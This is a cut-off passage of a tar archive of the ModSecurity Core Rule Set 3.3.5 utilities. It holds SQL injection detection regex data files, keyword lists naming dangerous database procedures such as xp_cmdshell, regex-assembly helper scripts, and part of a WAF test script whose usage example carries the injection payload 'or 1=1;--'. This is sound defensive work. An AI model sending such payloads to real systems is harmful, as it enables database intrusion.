^[\"'`\\\\]*?[\d\"'`]+\s*?xor\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?xxor\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?div\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?like\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?between\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?not\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?\|\|\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[\d\"'`]+\s*?\&\&\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?and\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?nand\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?or\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?xor\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?xxor\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?div\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?like\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?between\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?not\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?\|\|\s*?[\w\"'`][+&!@(),.-] ^[\"'`\\\\]*?[^\"'`]+[\"'`]\s*?\&\&\s*?[\w\"'`][+&!@(),.-] [^\w\s]\w+\s*?[|-]\s*?[\"'`]\s*?\w @\w+\s+and\s*?[\"'`\d]+ @\w+\s+or\s*?[\"'`\d]+ @\w+\s+xor\s*?[\"'`\d]+ @\w+\s+div\s*?[\"'`\d]+ @\w+\s+like\s*?[\"'`\d]+ @\w+\s+between\s*?[\"'`\d]+ @[\w-]+\sand\s*?[^\w\s] @[\w-]+\sor\s*?[^\w\s] @[\w-]+\sxor\s*?[^\w\s] @[\w-]+\sdiv\s*?[^\w\s] @[\w-]+\slike\s*?[^\w\s] @[\w-]+\sbetween\s*?[^\w\s] [^\w\s:]\s*?\d\W+[^\w\s]\s*?[\"'`]. \Winformation_schema table_name\W �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942340.data���������������������������������������0000664�0000000�0000000�00000001135�14461225151�0023607�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������in\s*?[(]+\s*?select (?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+regexp\s*?\( (?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+sounds\s+like\s*?[\"'`] (?i:n?and|x?x?or|div|like|between|not|\|\||\&\&)\s+[\s\w+]+[=\d]+x [\"'`]\s*?\d\s*?-- [\"'`]\s*?\d\s*?# [\"'`][\%&<>^=]+\d\s*?= [\"'`][\%&<>^=]+\d\s*?or [\"'`][\%&<>^=]+\d\s*?xor [\"'`][\%&<>^=]+\d\s*?div [\"'`][\%&<>^=]+\d\s*?like [\"'`][\%&<>^=]+\d\s*?between [\"'`][\%&<>^=]+\d\s*?and [\"'`]\W+[\w+-]+\s*?=\s*?\d\W+[\"'`] [\"'`]\s*?is\s*?\d.+[\"'`]?\w [\"'`][|]?[\w-]{3,}[^\w\s.,]+[\"'`] [\"'`]\s*?is\s*?[\d.]+\s*?\W.*?[\"'`] �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942350.data���������������������������������������0000664�0000000�0000000�00000000512�14461225151�0023606�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������create\s+function\s+.+\s+returns ;\s*?alter\b\s*?[\[(]?\w{2,} ;\s*?create\b\s*?[\[(]?\w{2,} ;\s*?delete\b\s*?[\[(]?\w{2,} ;\s*?desc\b\s*?[\[(]?\w{2,} ;\s*?insert\b\s*?[\[(]?\w{2,} ;\s*?load\b\s*?[\[(]?\w{2,} ;\s*?rename\b\s*?[\[(]?\w{2,} ;\s*?select\b\s*?[\[(]?\w{2,} ;\s*?truncate\b\s*?[\[(]?\w{2,} ;\s*?update\b\s*?[\[(]?\w{2,} ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942360.data���������������������������������������0000664�0000000�0000000�00000007434�14461225151�0023621�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������alter\s+char\s?[(]? alter\s+group_concat\s?[(]? alter\s+load_file\s?[(]? create\s+char\s?[(]? create\s+group_concat\s?[(]? create\s+load_file\s?[(]? delete\s+char\s?[(]? delete\s+group_concat\s?[(]? delete\s+load_file\s?[(]? desc\s+char\s?[(]? desc\s+group_concat\s?[(]? desc\s+load_file\s?[(]? insert\s+char\s?[(]? insert\s+group_concat\s?[(]? insert\s+load_file\s?[(]? load\s+char\s?[(]? load\s+group_concat\s?[(]? load\s+load_file\s?[(]? rename\s+char\s?[(]? rename\s+group_concat\s?[(]? rename\s+load_file\s?[(]? select\s+char\s?[(]? select\s+group_concat\s?[(]? select\s+load_file\s?[(]? truncate\s+char\s?[(]? truncate\s+group_concat\s?[(]? truncate\s+load_file\s?[(]? update\s+char\s?[(]? update\s+group_concat\s?[(]? update\s+load_file\s?[(]? end\s*?\); [\s(]load_file\s*?\( [\"'`]\s+regexp\W [\d\W]\s+as\b\s*[\"'`\w]+\s*\bfrom ^[\W\d]+\s*?create\s+\w+ ^[\W\d]+\s*?delete\b ^[\W\d]+\s*?desc\b ^[\W\d]+\s*?insert\b ^[\W\d]+\s*?load\b ^[\W\d]+\s*?rename\b ^[\W\d]+\s*?select\b ^[\W\d]+\s*?truncate\b ^[\W\d]+\s*?update\b ^[\W\d]+\s*?alter\s*aggregate\b ^[\W\d]+\s*?alter\s*application\s*role\b ^[\W\d]+\s*?alter\s*assembly\b ^[\W\d]+\s*?alter\s*asymmetric\s*key\b ^[\W\d]+\s*?alter\s*audit\b ^[\W\d]+\s*?alter\s*authorization\b ^[\W\d]+\s*?alter\s*availability\s*group\b ^[\W\d]+\s*?alter\s*broker\s*priority\b ^[\W\d]+\s*?alter\s*bufferpool\b ^[\W\d]+\s*?alter\s*certificate\b ^[\W\d]+\s*?alter\s*cluster\b ^[\W\d]+\s*?alter\s*collation\b ^[\W\d]+\s*?alter\s*column\b ^[\W\d]+\s*?alter\s*conversion\b ^[\W\d]+\s*?alter\s*credential\b ^[\W\d]+\s*?alter\s*cryptographic\s*provider\b ^[\W\d]+\s*?alter\s*database\b ^[\W\d]+\s*?alter\s*default\b ^[\W\d]+\s*?alter\s*dimension\b ^[\W\d]+\s*?alter\s*diskgroup\b ^[\W\d]+\s*?alter\s*domain\b ^[\W\d]+\s*?alter\s*endpoint\b ^[\W\d]+\s*?alter\s*extension\b ^[\W\d]+\s*?alter\s*external\b ^[\W\d]+\s*?alter\s*event\b ^[\W\d]+\s*?alter\s*flashback\b ^[\W\d]+\s*?alter\s*foreign\b ^[\W\d]+\s*?alter\s*fulltext\b ^[\W\d]+\s*?alter\s*function\b ^[\W\d]+\s*?alter\s*hierarchy\b ^[\W\d]+\s*?alter\s*group\b ^[\W\d]+\s*?alter\s*histogram\b ^[\W\d]+\s*?alter\s*index\b ^[\W\d]+\s*?alter\s*indextype\b ^[\W\d]+\s*?alter\s*inmemory\b ^[\W\d]+\s*?alter\s*instance\b ^[\W\d]+\s*?alter\s*java\b ^[\W\d]+\s*?alter\s*language\b ^[\W\d]+\s*?alter\s*large\b ^[\W\d]+\s*?alter\s*library\b ^[\W\d]+\s*?alter\s*lockdown\b ^[\W\d]+\s*?alter\s*logfile\s*group\b ^[\W\d]+\s*?alter\s*login\b ^[\W\d]+\s*?alter\s*mask\b ^[\W\d]+\s*?alter\s*master\s*key\b ^[\W\d]+\s*?alter\s*materialized\b ^[\W\d]+\s*?alter\s*message\s*type\b ^[\W\d]+\s*?alter\s*method\b ^[\W\d]+\s*?alter\s*module\b ^[\W\d]+\s*?alter\s*nickname\b ^[\W\d]+\s*?alter\s*operator\b ^[\W\d]+\s*?alter\s*outline\b ^[\W\d]+\s*?alter\s*package\b ^[\W\d]+\s*?alter\s*partition\b ^[\W\d]+\s*?alter\s*permission\b ^[\W\d]+\s*?alter\s*procedure\b ^[\W\d]+\s*?alter\s*profile\b ^[\W\d]+\s*?alter\s*queue\b ^[\W\d]+\s*?alter\s*remote\b ^[\W\d]+\s*?alter\s*resource\b ^[\W\d]+\s*?alter\s*role\b ^[\W\d]+\s*?alter\s*rollback\b ^[\W\d]+\s*?alter\s*route\b ^[\W\d]+\s*?alter\s*schema\b ^[\W\d]+\s*?alter\s*search\b ^[\W\d]+\s*?alter\s*security\b ^[\W\d]+\s*?alter\s*server\b ^[\W\d]+\s*?alter\s*service\b ^[\W\d]+\s*?alter\s*sequence\b ^[\W\d]+\s*?alter\s*session\b ^[\W\d]+\s*?alter\s*symmetric\s*key\b ^[\W\d]+\s*?alter\s*synonym\b ^[\W\d]+\s*?alter\s*stogroup\b ^[\W\d]+\s*?alter\s*table\b ^[\W\d]+\s*?alter\s*tablespace\b ^[\W\d]+\s*?alter\s*text\b ^[\W\d]+\s*?alter\s*threshold\b ^[\W\d]+\s*?alter\s*trigger\b ^[\W\d]+\s*?alter\s*trusted\b ^[\W\d]+\s*?alter\s*type\b ^[\W\d]+\s*?alter\s*usage\b ^[\W\d]+\s*?alter\s*user\b ^[\W\d]+\s*?alter\s*view\b ^[\W\d]+\s*?alter\s*work\b ^[\W\d]+\s*?alter\s*workload\b ^[\W\d]+\s*?alter\s*wrapper\b ^[\W\d]+\s*?alter\s*xml\s*schema\b ^[\W\d]+\s*?alter\s*xsrobject\b ^[\W\d]+\s*?union\s*all\b ^[\W\d]+\s*?union\s*select\b ^[\W\d]+\s*?union\s*distinct\b ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942370.data���������������������������������������0000664�0000000�0000000�00000001113�14461225151�0023606�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������[\"'`]\s*?\*.+or\W*?[\"'`]\d [\"'`]\s*?\*.+xor\W*?[\"'`]\d [\"'`]\s*?\*.+div\W*?[\"'`]\d [\"'`]\s*?\*.+like\W*?[\"'`]\d [\"'`]\s*?\*.+between\W*?[\"'`]\d [\"'`]\s*?\*.+and\W*?[\"'`]\d [\"'`]\s*?\*.+id\W*?[\"'`]\d \^[\"'`] [\"'`]\s*?[^\w\s?]+\s*?[^\w\s]+\s*?[\"'`] [\"'`]\s*?[^\w\s]+\s*?[\W\d].*?# [\"'`]\s*?[^\w\s]+\s*?[\W\d].*?-- [\"'`].*?\*\s*?\d [\"'`]\s*?or\s[^\d]+[\w-]+.*?\d [\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d [\"'`]\s*?div\s[^\d]+[\w-]+.*?\d [\"'`]\s*?like\s[^\d]+[\w-]+.*?\d [\"'`]\s*?between\s[^\d]+[\w-]+.*?\d [\"'`]\s*?and\s[^\d]+[\w-]+.*?\d [()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,] �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942380.data���������������������������������������0000664�0000000�0000000�00000000765�14461225151�0023623�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\b(?i:having)\b\s+\d{1,10}\s*?[=<>] \b(?i:having)\b\s+'[^=]{1,10}'\s*?[=<>] (?i:\bexecute\() (?i:\bexecute\s{1,5}[\w\.$]{1,5}\s{0,3}) \bhaving\b ?\d{1,10} ?[=<>]+ \bhaving\b ?[\'\"][^=]{1,10}[\'\" ?[=<>]+ (?i:\bcreate\s+?table.{0,20}?\() (?i:\blike\W*?char\W*?\() (?i:select.*?case) (?i:from.*?limit) (?i:order\sby) exists\s\sselect exists\sselect\Sif\s\( exists\sselect\Sifnull\s\( exists\sselect\Stop exists\sselect\Sconcat exists\ssystem\s\( exists\s\b(?i:having)\b\s+\d{1,10} exists\s'[^=]{1,10}' �����������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942390.data���������������������������������������0000664�0000000�0000000�00000000571�14461225151�0023617�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������(?i:\bor\b ?\d{1,10} ?[=<>]+) (?i:\bor\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+) (?i:'\s+or\s+.{1,20}[+\-!<>=]) (?i:'\s+xor\s+.{1,20}[+\-!<>=]) \b(?i:or)\b\s+\d{1,10} \b(?i:or)\b\s+'[^=]{1,10}' \b(?i:xor)\b\s+\d{1,10} \b(?i:xor)\b\s+'[^=]{1,10}' \b(?i:or)\b\s+\d{1,10}\s*?[=<>] \b(?i:xor)\b\s+\d{1,10}\s*?[=<>] \b(?i:or)\b\s+'[^=]{1,10}'\s*?[=<>] \b(?i:xor)\b\s+'[^=]{1,10}'\s*?[=<>] ���������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942400.data���������������������������������������0000664�0000000�0000000�00000000250�14461225151�0023601�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\band\b\s+\d{1,10}\s*?[=<>] \band\b\s+'[^=]{1,10}'\s*?[=<>] \band\b\s+\d{1,10} \band\b\s+'[^=]{1,10}' \band\b ?\d{1,10} ?[=<>]+ \band\b ?[\'\"][^=]{1,10}[\'\"] ?[=<>]+ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942410.data���������������������������������������0000664�0000000�0000000�00000003733�14461225151�0023613�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������abs acos adddate addtime aes_decrypt aes_encrypt asin ascii asciistr atan atan2 avg benchmark bin bin_to_num bit_and bit_count bit_length bit_or bit_xor cast char character_length char_length charset chr ciel cieling coalesce coercibility compress concat concat_ws connection_id conv convert convert_tz cos cot count cr32 curdate current_date current_time current_timestamp current_user curtime database date date_add datediff date_format date_sub day dayname dayofmonth dayofweek dayofyear dcount decode default degrees des_decrypt des_encrypt dump elt encode encrypt exp export_set extract extractvalue field field_in_set find_in_set floor format found_rows from_base64 from_days from_unixtime get_format get_lock greatest group_concat hex hextoraw hour if ifnull in inet6_aton inet6_ntoa inet_aton inet_ntoa insert instr interval is is_free_lock is_ipv4 is_ipv4_compat is_ipv4_mapped is_ipv6 is_not is_not_null isnull is_null is_used_lock last last_day last_insert_id lcase least left length ln load_file local localtimestamp locate log log10 log2 lower lpad ltrim makedate make_set master_pos_wait max md5 microsecond mid min minute mod month monthname name_const not_in now nullif oct octet_length old_password ord password period_add period_diff pg_sleep pi position pow power procedure_analyse quarter quote radians rand rawtohex rawtonhex rawtonhextoraw release_lock repeat replace reverse right round row_count rpad rtrim schema second sec_to_time session_user sha sha1 sha2 sign sin sleep soundex space sqrt std stddev stddev_pop stddev_samp strcmp str_to_date subdate substr substring substring_index subtime sum sysdate system_user tan time timediff time_format timestamp timestampadd timestampdiff time_to_sec to_base64 to_char to_days to_nchar to_seconds trim truncate ucase uncompress uncompressed_length unhex unix_timestamp updatexml upper user utc_date utc_time utc_timestamp uuid uuid_short values variance var_pop var_samp version week weekday weekofyear weight_string xmltype year yearweek �������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942470.data���������������������������������������0000664�0000000�0000000�00000001163�14461225151�0023614�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������autonomous_transaction dba_users dbms_java nvarchar openowa_util openquery openrowset sp_addextendedproc sp_execute sp_executesql sp_help sp_is_srvrolemember sp_makewebtask sp_oacreate sp_password sp_prepare sp_replwritetovarbin sp_sqlexec sql_longvarchar sql_variant tbcreator utl_file utl_http varchar xp_availablemedia xp_cmdshell xp_dirtree xp_enumdsn xp_execresultset xp_filelist xp_loginconfig xp_makecab xp_ntsec xp_ntsec_enumdomains xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwrite xp_servicecontrol xp_terminate xp_terminate_process �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-942480.data���������������������������������������0000664�0000000�0000000�00000001333�14461225151�0023614�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������\bdbms_\w+\.\b \bdelete\b\W*?\bfrom\b \bgroup\b.*?\bby\b.{1,100}?\bhaving\b \binner\b\W*?\bjoin\b \binsert\b\W*?\binto\b \binto\b\W*?\bdumpfile\b \binto\b\W*?\boutfile\b \bload\b\W*?\bdata\b.*?\binfile\b \bprint\b\W*?\@\@ \bselect\b.{1,100}?\b.*?\bdump\b.*\bfrom\b \bselect\b.{1,100}?\bcount\b.{1,100}?\bfrom\b \bselect\b.{1,100}?\bdata_type\b \bselect\b.{1,100}?\bfrom\b.{1,100}?\bwhere\b \bselect\b.{1,100}?\binstr\b \bselect\b.{1,100}?\blength\b.{1,100}?\bfrom\b \bselect\b.{1,100}?\bto_char\b \bselect\b.{1,100}?\bto_number\b \bselect\b.{1,100}?\btop\b.{1,100}?\bfrom\b \bsys_context\b \bunion\b.{1,100}?\bselect\b \butl_inaddr\b collation\W*?\(a\b 'dbo' 'msdasql' 'sa' 'sqloledb' \@\@version\b ;\W*?\bdrop\b ;\W*?\bshutdown\b �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-assemble-v2.pl������������������������������������0000775�0000000�0000000�00000001311�14461225151�0024663�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env perl # # Create one regexp from a set of regexps. # Regexps can be submitted via standard input, one per line. # # Requires Regexp::Assemble Perl module. # To install: cpan install Regexp::Assemble # # See: https://coreruleset.org/20190826/optimizing-regular-expressions/ # use strict; use Regexp::Assemble; my $ra = Regexp::Assemble->new; while (<>) { # Handle possessive qualifiers # https://rt.cpan.org/Public/Bug/Display.html?id=50228#txn-672717 my $arr = $ra->lexstr($_); for (my $n = 0; $n < $#$arr - 1; ++$n) { if ($arr->[$n] =~ /\+$/ and $arr->[$n + 1] eq '+') { $arr->[$n] .= splice(@$arr, $n + 1, 1); } } $ra->insert(@$arr); } print $ra->as_string() . "\n"; �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-assemble.pl���������������������������������������0000775�0000000�0000000�00000000643�14461225151�0024345�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env perl # # Create one regexp from a set of regexps. # Regexps can be submitted via standard input, one per line. # # Requires Regexp::Assemble Perl module. # To install: cpan install Regexp::Assemble # # See: https://coreruleset.org/20190826/optimizing-regular-expressions/ # use strict; use Regexp::Assemble; my $ra = Regexp::Assemble->new; while (<>) { $ra->add($_); } print $ra->as_string() . "\n"; ���������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-assemble/regexp-cmdline.py����������������������������������������0000775�0000000�0000000�00000003705�14461225151�0024204�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python # # Convert a word list to a list of regexps usable by Regexp::Assemble. # # Examples: # cat regexp-932100.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # cat regexp-932110.txt | ./regexp-cmdline.py windows | ./regexp-assemble.pl # cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl # # Refer to rule 932100, 932110, 932150 for documentation. # import fileinput, string, sys # Convert a single line to regexp format, and insert anti-cmdline # evasions between characters. def regexp_str(str, evasion): # By convention, if the line starts with ' char, copy the rest # verbatim. if str[0] == "'": return str[1:] result = '' for i, char in enumerate(str): if i > 0: result += evasion result += regexp_char(char, evasion) return result # Ensure that some special characters are escaped def regexp_char(char, evasion): char = str.replace(char, '.', '\.') char = str.replace(char, '-', '\-') char = str.replace(char, '+', r'''(?:\s|<|>).*''') # Unix: "cat foo", "catfoo" char = str.replace(char, '@', r'''(?:[\s,;]|\.|/|<|>).*''') # Windows: "more foo", "more,foo", "more;foo", "more.com", "more/e", # "morefoo" char = str.replace(char, ' ', '\s+') # Ensure multiple spaces are matched return char # Insert these sequences between characters to prevent evasion. # This emulates the relevant parts of t:cmdLine. evasions = { 'unix': r'''[\\\\'\"]*''', 'windows': r'''[\"\^]*''', } # Parse arguments if len(sys.argv) <= 1 or not sys.argv[1] in evasions: print(sys.argv[0] + ' unix|windows [infile]') sys.exit(1) evasion = evasions[sys.argv[1]] del sys.argv[1] # Process lines from input file, or if not specified, standard input for line in fileinput.input(): line = line.rstrip('\n ') line = line.split('#')[0] if line != '': print(regexp_str(line, evasion)) �����������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-tricks/�����������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0020423�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/regexp-tricks/negative-lookahead.py��������������������������������������0000664�0000000�0000000�00000006417�14461225151�0024534�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������import argparse # WARNING: This script is EXPERIMENTAL. Use with caution. # # Known issues: # * At the moment, it will probably not work with more than two strings. # # Known limitations: # * Any substrings of a target string will also NOT be matched. This is probably due to a limitation in this technique, # make sure that subtrings of the negative lookahead are not harmful in any way. parser = argparse.ArgumentParser(description="This script takes a list of strings and converts them into \ a regex that acts like a negative lookahead") parser.add_argument("strings", type=str, nargs='+', help="the strings to convert into a negative lookahead") parser.add_argument("--prefix", type=str, default="", help="sets a prefix for the resulting regex") parser.add_argument("--suffix", type=str, default="", help="sets a suffix for the resulting regex") args = parser.parse_args() # Return the longest prefix of all list elements. Shamelessly copied from: # https://stackoverflow.com/questions/6718196/determine-prefix-from-a-set-of-similar-strings def commonprefix(m): "Given a list of pathnames, returns the longest common leading component" if not m: return '' s1 = min(m) s2 = max(m) for i, c in enumerate(s1): if c != s2[i]: return s1[:i] return s1 # flatten returns a string with concatenated dictionary keys def flatten(dict): s = "" for key in dict.keys(): s += key return s # set returns a character set containing the unique characters across all strings for the given index def set(strings, index, flags): dict = {} for s in strings: # Continue so we don't panic if index > len(s) -1: continue dict[s[index]] = '' return "[" + flags + flatten(dict) + "]" # prepare converts a string for negative lookaheads emulation def prepare(s, offset): r = "" if len(s) == 0: return r for i in range(offset, len(s)): for j in range(0, i + 1): if j == i: r += "[^" + s[j] + "]" else: r += s[j] if i != len(s) - 1: r += "|" return r # run runs the def run(): strings = args.strings r = "" r += set(strings, 0, "^") c = "" d = {} # Only find common string if we have more than one if len(strings) > 1: c = commonprefix(strings) # Collect all characters after the common substring from every string for s in strings: if len(s) > len(c) and s.startswith(c): d[s[len(c)]] = '' # Add the common string to the regex to prevent accidental matching if len(c) > 0: if len(c) > 1: r += "|" + "(?:" + prepare(c, 1) + ")" r += "|" + "(?:" + c + "[^" + flatten(d) + "]" + ")" for s in strings: g = "" # When the common string is > 0, offset with len(c) + 1 because we handled this earlier if len(c) > 0: g = prepare(s, len(c) + 1) else: g = prepare(s, 1) # Add OR boolean if necessary if len(g) > 0: r += "|" r += g print(args.prefix + "(?:" + r + ")" + args.suffix) # Only run if script is called directly if __name__ == "__main__": run() �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/send-payload-pls.sh������������������������������������������������������0000775�0000000�0000000�00000015675�14461225151�0021365�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/bin/bash # # Script to post a payload against a local webserver at each paranoia level. # # Note: Webserver has to be prepared to take desired PL as Request Header "PL". # # WARNING: Setting the paranoia level using a header without proper # authentication and authorization is extremely dangerous, and is not # recommended for production. # # Check how to use the Christian Folini's Apache access log format at: # https://www.netnea.com/cms/apache-tutorial-5_extending-access-log/ # # LogFormat "%h %{GEOIP_COUNTRY_CODE}e %u [%{%Y-%m-%d %H:%M:%S}t.%{usec_frac}t] \"%r\" %>s %b \ # \"%{Referer}i\" \"%{User-Agent}i\" \"%{Content-Type}i\" %{remote}p %v %A %p %R \ # %{BALANCER_WORKER_ROUTE}e %X \"%{cookie}n\" %{UNIQUE_ID}e %{SSL_PROTOCOL}x %{SSL_CIPHER}x \ # %I %O %{ratio}n%% %D %{ModSecTimeIn}e %{ApplicationTime}e %{ModSecTimeOut}e \ # %{ModSecAnomalyScoreInPLs}e %{ModSecAnomalyScoreOutPLs}e \ # %{ModSecAnomalyScoreIn}e %{ModSecAnomalyScoreOut}e" extended # # This script assumes %{ModSecAnomalyScoreIn}e is the column before to last in # the access log, if this does not match your LogFormat the script won't work # For better results set the SecDefaultAction to 'pass'. # # The anomaly score envvar can be set as follows: # SecAction "id:90101,phase:5,pass,nolog,\ # setenv:ModSecAnomalyScoreIn=%{TX.anomaly_score}" # # Sample rule to setup the PL dynamically from localhost" # SecRule REMOTE_ADDR "@ipMatch 127.0.0.1,192.168.0.128" \ # "id:90102,phase:1,pass,capture,log,auditlog,\ # msg:'Setting engine to PL%{matched_var}',chain" # SecRule REQUEST_HEADERS:PL "@rx ([1-4])" \ # "setvar:'tx.executing_paranoia_level=%{matched_var}'" # Path to CRS rule set and local files CRS="/usr/share/modsecurity-crs/rules" accesslog="/apache/logs/access.log" errorlog="/apache/logs/error.log" URL="localhost:40080" protocol="http" while [[ $# > 0 ]] do case "$1" in -c|--crs) CRS="$2" shift ;; -a|--access) accesslog="$2" shift ;; -e|--error) errorlog="$2" shift ;; -u|--url) URL="$2" shift ;; -r|--resolve) resolve="$2" resolve="--resolve $resolve" shift ;; --protocol) protocol="$2" shift ;; -P|--payload) PAYLOAD="$2" shift ;; -h|--help) echo "Usage:" echo " --access \"/apache/logs/access.log\"" echo " --error \"/apache/logs/error.log\"" echo " --url \"localhost:40080\"" echo " --resolve \"someservername:40080:localhost\"" echo " --protocol \"https\"" echo " --payload \"/tmp/payload\"" echo " --help" exit 1 ;; esac shift done echo "Using CRS: $CRS" echo "Using accesslog: $accesslog" echo "Using errorlog: $errorlog" echo "Using URL: $URL" echo "Using protocol: $protocol" if [ -z "${PAYLOAD+x}" ]; then echo "Please submit valid payload file as parameter. This is fatal. Aborting." $0 -h echo "Examples:" echo " ./send-payload-pls.sh -a /logs/test/access.log \ -e /logs/test/error.log -u test.test.test.com:6443 --protocol https \ --payload /tmp/payload --resolve test.test.test.com:6443:192.168.0.128" echo " ./send-payload-pls.sh -a /logs/test/access.log \ -e /logs/test/error.log -u test.test.test.com:6443 --protocol https \ --payload 'or 1=1;--' --resolve test.test.test.com:6443:192.168.0.128" exit 1 fi # URL of web server # Rules per Paranoia level # Paranoia level 1 rules, rule 012 is the delimiter of the start of PL1 # Paranoia level 1 rules, rule 013 is the delimiter of the end of PL1 PL1=$(awk "/012,phase:2/,/013,phase:1/" $CRS/*.conf |egrep -v "(012|013),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') # Paranoia level 2 rules, rule 014 is the delimiter of the start of PL2 # Paranoia level 2 rules, rule 015 is the delimiter of the end of PL2 PL2=$(awk "/014,phase:2/,/015,phase:1/" $CRS/*.conf |egrep -v "(014|015),phase" |egrep -o "id:[0-9]+" |sed -r 's,id:([0-9]+),\1\\,' |tr -t '\n' '\|' |sed -r 's,\\\|$,,') # Paranoia level 3 rules, rule 016 is the delimiter of the start of PL3 # Paranoia level 3 rules, rule 017 is the delimiter of the end of PL3 PL3=$(awk "/016,phase:2/,/017,phase:1/" 